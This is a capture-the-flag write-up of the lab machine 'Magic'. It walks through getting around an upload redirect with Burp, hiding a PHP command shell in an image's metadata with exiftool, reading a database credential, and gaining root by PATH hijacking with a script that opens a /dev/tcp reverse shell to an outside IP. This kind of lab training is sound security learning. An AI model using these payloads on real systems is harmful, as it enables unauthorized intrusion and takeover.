Magic, a Medium-rated machine, features an upload console hidden behind 302 HTTP redirect responses. After using Burp Suite to access the console, we can upload an image file with embedded PHP code to gain a foothold through remote code execution. Once on the machine, privilege escalation takes advantage of binaries running without a full system paths that can be manipulated to run from an updated $PATH environment.
Initial nmap scans show only SSH and HTTP are open (ports 22 and 80, respectively). The web server is running Apache, but has a unique landing page hosting images with hex values as the "name":
While the hex value of "4d6167696" on the bottom right of the page does represent "Magic" in ASCII characters, finding any combination of the values under the pictures appears to be a rabbit hole. Enumerating this web server using gobuster brings the following results:
/index.php (Status: 200)
/images (Status: 301)
/login.php (Status: 200)
/assets (Status: 301)
/upload.php (Status: 302)
/logout.php (Status: 302)
/server-status (Status: 403)
The login page is simple enough, but as we don't have credentials to authenticate, we'll have to find another way in. Navigating to /upload.php seems like the next logical choice to gain a foothold, but accessing the page forces a redirect to the /login.php page. Taking a closer look with Burp Suite, we can see the header responsible:
Note: during this testing, in some cases I was able to directly bypass the redirect and in others I couldn't. For the foothold section, we'll detail the path I took assuming there was no caching mechanism for bypass.
The server responds with a header "Location: login.php", forcing the redirection back to the login page. Burp Suite has built-in functionality to ignore these redirects if you configure it to replace HTTP responses with those of your choosing. In the current configuration for Burp, the server is responding by saying, "Yes, I know that page you're looking for; it's over here!" and Burp follows the redirection. What we want Burp to do instead is access the requested page as if it were serving a 200 OK response, performing a Jedi mind trick by stating, "This is not the redirection you're looking for."
To do so, navigate to "Proxy > Options > Match and Replace" and add a new rule with the following settings:
Now we can navigate to /upload.php and Burp will replace all instances of in the Response Header of "302 Found" with "200 OK". We now have access to the the upload page; however, the only allowed file types are images. Trying to upload a PHP reverse shell with an added image extension won't work (i.e., grotek.php.jpg), but what will work is embedding PHP code into a legitimate image file and then adding the additional picture extension.
Using exiftool, we can issue the following command to create a variable we can pass code to when accessing our image:
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' tek.jpg
Now, when we access our image in a browser, we can pass command line arguments using the "?cmd=" command. One tool I've found VERY helpful when crafting reverse shells on the fly in multiple languages is revshellgen. This python script will automatically give you the code for a reverse shell based on the networking interface, language to use, and also URL encode if needed. Trust me, it's a massive time saver.
With a reverse shell created in PHP and URL encoded, we can navigate to our manipulated picture after uploading to catch a reverse shell:
Now that we have command line access, albeit as www-data, we can start the privilege escalation process. Navigating to the home directory, we notice a folder named "Magic" that contains a file named db.php5. The contents reveal credentials for MySQL, running locally. The only pitfall is MySQL isn't installed on this machine, forcing us to use a different tool to dump the contents. If only there was a tool to dump the contents of MySQL databases that are installed...
Here we can see a new set of credentials, admin:Th3s3usW4sK1ng, that also happen to work for SSH. With access as theseus, we can begin our enumeration process using LinPEAS.sh and PSPY. LinPEAS will certainly show what exactly can be manipulated, but to fully understand the attack path, PSPY will be more helpful. When reviewing the output of PSPY, "/bin/sysinfo" executes commands that aren't using the full file paths, one of those being invoked with "sh -c":
Seeing that free is being executed with bash, we can change our $PATH variable to execute a version of free that we've manipulated. First, create a file named free in a path of your choosing that contains the following code:
/bin/sh -i >& /dev/tcp/10.10.14.14/1111 0>&1
Second, give this file executable permissions:
Chmod +x ./free
And lastly, add the directory that contains the manipulated free binary to the beginning of theseus' $PATH directory and execute /bin/sysinfo:
If successful, we now have successfully rooted Magic: